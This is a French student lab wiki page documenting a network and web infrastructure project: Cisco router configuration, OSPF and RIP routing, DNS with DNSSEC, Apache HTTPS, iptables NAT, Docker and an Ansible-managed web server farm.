  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/hosts'''&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/ansible/hosts'''       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 '''root@mycoplasma:~# ansible all -m ping -o'''&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible.&lt;br /&gt;
&lt;br /&gt;
root@mycoplasma:/etc/ansible/PLAYBOOKS# ansible-playbook deploy-site.yaml&lt;br /&gt;
&lt;br /&gt;
 PLAY [webservers]     *********************************************************************************************************************************************** *******&lt;br /&gt;
&lt;br /&gt;
 TASK [Gathering Facts]  *************************************************************************************************************************************************&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie]&lt;br /&gt;
&lt;br /&gt;
 TASK [1. Copying Website files] ****************************************************************************************************************************************&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [2. Copying Dockerfile] *******************************************************************************************************************************************&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
